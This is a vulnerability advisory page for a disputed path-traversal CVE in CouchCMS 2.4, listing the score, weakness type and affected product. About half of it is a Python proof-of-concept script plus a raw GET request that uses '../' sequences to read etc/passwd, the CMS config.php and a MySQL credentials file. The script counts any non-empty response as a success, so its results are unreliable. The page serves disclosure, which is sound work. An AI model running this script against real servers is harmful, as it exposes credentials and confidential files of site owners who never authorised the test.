Security Vulnerability Report

CVE-2025-67004 (CVSS 6.5 MEDIUM)

Published: 2026-01-09 17:15:53
Last Modified: 2026-01-23 19:15:53

Description

** Disputed ** An Information Disclosure vulnerability in CouchCMS 2.4 allows an Admin user to read arbitrary files by repeatedly traversing back up the directory tree. It can disclose the source code or any other confidential information if weaponized accordingly. NOTE: A community member states that this is not a CouchCMS vulnerability and that if /\<file> is accessible it is a web-server configuration issue.

CVSS Details

CVSS Score: 6.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
Exploitability Score: 2.8
Impact Score: 3.6
Weakness: CWE-22 (Path Traversal)

Configurations (Affected Products)

cpe:2.3:a:couchcms:couchcms:2.4:*:*:*:*:*:*:* - VULNERABLE
CouchCMS 2.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-67004 PoC - CouchCMS Directory Traversal
# Target: CouchCMS <= 2.4
# Vulnerability: Information Disclosure via Path Traversal
import requests
import sys

TARGET_URL = "http://target-site.com/couchcms/kCF.php"


def test_file_read(filepath):
    """Test file read via directory traversal"""
    # Construct traversal path
    traversal = "../" * 5  # Adjust depth as needed
    params = {
        "file": traversal + filepath
    }
    try:
        response = requests.get(TARGET_URL, params=params, timeout=10)
        # Any non-empty 200 response is returned as-is; the caller must check
        # whether the body is the requested file or just an ordinary CMS page.
        if response.status_code == 200 and len(response.content) > 0:
            return response.text
    except Exception as e:
        print(f"Error: {e}")
    return None


def main():
    global TARGET_URL  # Needed so the assignment below updates the module-level URL
    if len(sys.argv) < 2:
        print("Usage: python poc.py <target_url>")
        sys.exit(1)
    TARGET_URL = sys.argv[1]
    # Test files to read
    test_files = [
        "etc/passwd",
        "var/www/html/couchcms/config.php",
        "etc/hosts",
        "home/www/.my.cnf"
    ]
    for file in test_files:
        print(f"\n[*] Attempting to read: {file}")
        content = test_file_read(file)
        if content:
            print(f"[+] Success! Content length: {len(content)}")
            print(content[:500])  # Print first 500 chars


if __name__ == "__main__":
    main()

# Alternative PoC - HTTP Request:
# GET /couchcms/kCF.php?file=../../../../etc/passwd HTTP/1.1
# Host: target-site.com
```

References

https://gist.github.com/thepiyushkumarshukla/d01f8004c43692f18c75548f4739955a (Exploit, Third Party Advisory)
https://github.com/CouchCMS/CouchCMS (Product)
https://www.couchcms.com/ (Product)

Record status: Modified; the CVE source tags the entry as "disputed".